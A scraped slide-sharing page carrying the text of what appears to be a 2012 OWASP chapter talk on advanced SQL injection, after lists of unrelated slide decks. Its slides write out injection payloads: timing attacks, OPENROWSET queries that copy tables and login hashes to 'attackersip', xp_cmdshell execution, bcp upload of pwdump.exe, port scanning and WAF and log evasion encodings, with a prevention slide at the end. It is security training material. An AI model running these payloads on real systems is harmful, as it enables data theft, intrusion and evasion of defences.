JDBC Tutorial
JDBC TutorialJDBC Tutorial
JDBC Tutorial
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
Raj mysql
Raj mysqlRaj mysql
Raj mysql
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
 
Lecture17
Lecture17Lecture17
Lecture17
 
Jdbc ppt
Jdbc pptJdbc ppt
Jdbc ppt
 
Python with MySql.pptx
Python with MySql.pptxPython with MySql.pptx
Python with MySql.pptx
 
Sql injection
Sql injectionSql injection
Sql injection
 
Operation outbreak
Operation outbreakOperation outbreak
Operation outbreak
 

Recently uploaded

Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
Edge AI and Vision Alliance
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website
Pixlogix Infotech
 
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Zilliz
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
TIPNGVN2
 

Recently uploaded (20)

Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website
 
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
 

Owasp Indy Q2 2012 Advanced SQLi

  • 1. Advanced SQLi and Evasion Techniques
  • 2. About Me Introduction Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP dprofancik@gmail.com @integrisec
  • 3. Credit Cesar Cerrudo – CTO, IOActive Labs o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injecti on.pdf ModSecurity Team – Trustwave SpiderLabs o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons- learned.html Avi Douglen – OWASP Board Member, Israel o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
  • 4. SQL Injection Basics • Dynamic construction of SQL queries “SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'” • Unsanitized user input uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd ='' • Excessive permission o Web services running as privileged user with db_owner rights o Connecting to database using sa, dbo, or sysadmin accounts o Lax file system permissions
  • 5.
  • 6.
  • 7.
  • 8.
  • 9. Advance SQLi Techniques • Blind SQL Injection • Data Exfiltration • Privilege Escalation • Command Execution • Uploading Files • Internal DB Server Exploration • Port Scanning • Firewall Evasion • Log Evasion • WAF Evasion
  • 11. Blind SQL Injection • Differential Analysis Example: http://www.someforum.com/posts.php?id=2 SELECT author, title, body FROM posts WHERE ID = 2 http://www.someforum.com/posts.php?id=2 and 1=2 SELECT author, title, body FROM posts WHERE ID = 2 and 1=2 http://www.someforum.com/posts.php?id=2 and 1=1 SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
  • 12. Blind SQL Injection (cont.) • Database Management System Fingerprinting o System Functions • MS SQL Server = getdate() • MySQL = now() • Oracle = sysdate() • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate() o String Concatenation • MS SQL Server = + • MySQL = +, CONCAT() • Oracle = ||, CONCAT() • Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st' o Query Chaining • MS SQL Server, MySQL = allows chaining with semicolon • Oracle = does NOT allow chaining with semicolon • Example: http://www.someforum.com/posts.php?id=2; commit --
  • 13. Blind SQL Injection (cont.) • Timing Attacks o Adding delay • SQL Server = WAIT FOR DELAY '0:0:10‘ • MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) • PostgreSQL = pg_sleep(10) • Oracle = Union with query that contains a lot of results o SELECT IF(condition, true, false) Example: …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
  • 15. Linked and Remote Servers • OPENROWSET Example: SELECT * FROM OPENROWSET( 'SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' 'SELECT * FROM table' ) • OPENDATASOURCE Example: SELECT * FROM OPENDATASOURCE( 'SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' ) .DatabaseName.dbo.TableName
  • 16. Data Exfiltration • Remote server INSERT Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM table2
  • 17. Data Exfiltration (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM master.dbo.sysdatabases INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysobjects ') SELECT * FROM databasename.dbo.sysobjects INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _syscolumns') SELECT * FROM databasename.dbo.syscolumns
  • 18. Data Exfiltration (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM databasename..table1 INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table2') SELECT * FROM databasename..table2 INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', ‘SELECT * FROM _sysxlogins') SELECT * FROM databasename.dbo.sysxlogins
  • 19. Privilege Escalation • Known vulnerabilities Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt • Often not required o Connection strings using SA, dbo, sysadmin o Web service context
  • 20. Command Execution Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC master.dbo.xp_cmdshell 'dir'
  • 21. Uploading Files On attacker’s server… 1. CREATE TABLE AttackerTable (data text) 2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW') On victim’s server… 3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d' 4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftMSSQLServerClientConnectTo','AttackersAlias','REG_SZ' ,'DBMSSOCN,AttackersIP,80' 5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias - Usa -Ppwn3d'
  • 22. Uploading Files (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC xp_cmdshell '"first script line" >> script.vbs' … EXEC xp_cmdshell '"second script line" >> script.vbs' ... EXEC xp_cmdshell '"last script line" >> script.vbs' EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
  • 23. Internal DB Server Exploration • Linked and Remote Servers 1. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM master.dbo.sysservers 2. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM linkedserver1.master.dbo.sysservers 3. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM linkedserver1.master.dbo.sysdatabases 4. Rinse and repeat…
  • 24. Port Scanning Example: SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5', 'SELECT * FROM table')
  • 26. Firewall Evasion • Use port 80 for outbound Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;', 'SELECT * FROM table1') SELECT * FROM table2
  • 27. Log Evasion • Inject using POST parameters • Long HTTP requests o IIS truncates requests longer than 4097 characters o Sun-One Application Server truncates at 4092 characters Example: http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
  • 28. WAF Evasion • Comments o # = single line comment o -- = single line comment o /* */ = inline, multi-line comment o /*! */ = MySQL-specific inline, multi-line comment Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM… • New line o %0D%0A = URL-encoded newline o %0B = URL-encoded vertical separator Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
  • 29. WAF Evasion (cont.) • Character Encoding o Unicode (U+02BC = ʼ) o CHAR() o Hexadecimal o URL-encoding o Double Encoding Example: Double Encoding: URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM… WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM… Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
  • 30. WAF Evasion (cont.) • Concatenation o EXEC() o Split/Join o Special Characters (i.e. ‘*‘, ‘+’, ‘%’, etc.) Example: Split/Join: URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users WAF = id=SELECT name id=password FROM users ASP/ASP.Net = id=SELECT name,password FROM users Special Characters: URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users WAF = id=SEL%ECT name,password FR%OM users ASP/ASP.Net = id=SELECT name,password FROM users
  • 31.
  • 33. SQLi Prevention • Sanitize User Input o Normalize Input o Whitelists o Built-in Functions o Regular Expressions o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.) • Prepared Statements/Parameterized Queries • Stored Procedures • Accounts with Least Privilege • Enable DisallowAdhocAccess registry setting for MS SQL Server • Perform Self Assessments • Use a Web Application Firewall • Filter Outbound Traffic at Firewall
  • 34. Q&A